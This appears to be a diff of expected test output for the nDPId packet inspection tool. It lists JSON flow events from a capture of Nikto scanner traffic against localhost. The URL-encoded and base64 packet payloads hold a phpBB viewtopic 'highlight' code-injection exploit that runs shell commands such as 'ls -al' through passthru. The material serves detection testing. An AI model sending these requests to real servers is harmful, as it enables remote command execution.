{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7580000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277788,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_packet_id":1,"flow_last_seen":1576420277788,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":1576420277788,"pkt":"AAAAAAAAAAAAAAAACABFAAFMGchAAEAGIeJ\/AAABfwAAAcbmH5Ae1yDiPfgPVIAYAED\/QAAAAQEICp1m\/0OdZv9DR0VUIC9waHBCQi92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQoNCg=="} 
-01190{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7580000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277788,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +01190{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7580000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277788,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7580000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00856{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_packet_id":1,"flow_last_seen":1576420277790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":1576420277790,"pkt":"AAAAAAAAAAAAAAAACABFAAFMIAVAAEAGG6V\/AAABfwAAAcboH5Bd5RklMuM7\/YAYAED\/QAAAAQEICp1m\/0adZv9GR0VUIC9mb3J1bS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01190{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7580000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +01190{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7580000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_packet_id":1,"flow_last_seen":1576420277792,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277792,"pkt":"AAAAAAAAAAAAAAAACABFAAFfB5NAAEAGNAR\/AAABfwAAAcbqH5CefT66jrIPCIAYAED\/UwAAAQEICp1m\/0idZv9HR0VUIC9pbmRleC5waHA\/bmFtZT1QTnBocEJCMiZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01208{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001393)"}} +01208{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001393)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_packet_id":1,"flow_last_seen":1576420277794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277794,"pkt":"AAAAAAAAAAAAAAAACABFAAFmgStAAEAGumR\/AAABfwAAAcbsH5DtZbgCN0MtSoAYAED\/WgAAAQEICp1m\/0qdZv9KR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001394)"}} +01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001394)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277795,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_packet_id":1,"flow_last_seen":1576420277795,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277795,"pkt":"AAAAAAAAAAAAAAAACABFAAFmgfFAAEAGuZ5\/AAABfwAAAcbuH5ChILjHXT7L3YAYAED\/WgAAAQEICp1m\/0udZv9LR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NSkNCg0K"} 
-01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277795,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001395)"}} +01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277795,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001395)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00859{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_packet_id":1,"flow_last_seen":1576420277797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277797,"pkt":"AAAAAAAAAAAAAAAACABFAAFPlMhAAEAGpt5\/AAABfwAAAcbwH5AHpq3wv20OaIAYAED\/QwAAAQEICp1m\/02dZv9NR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01192{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001396)"}} +01192{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001396)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277799,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 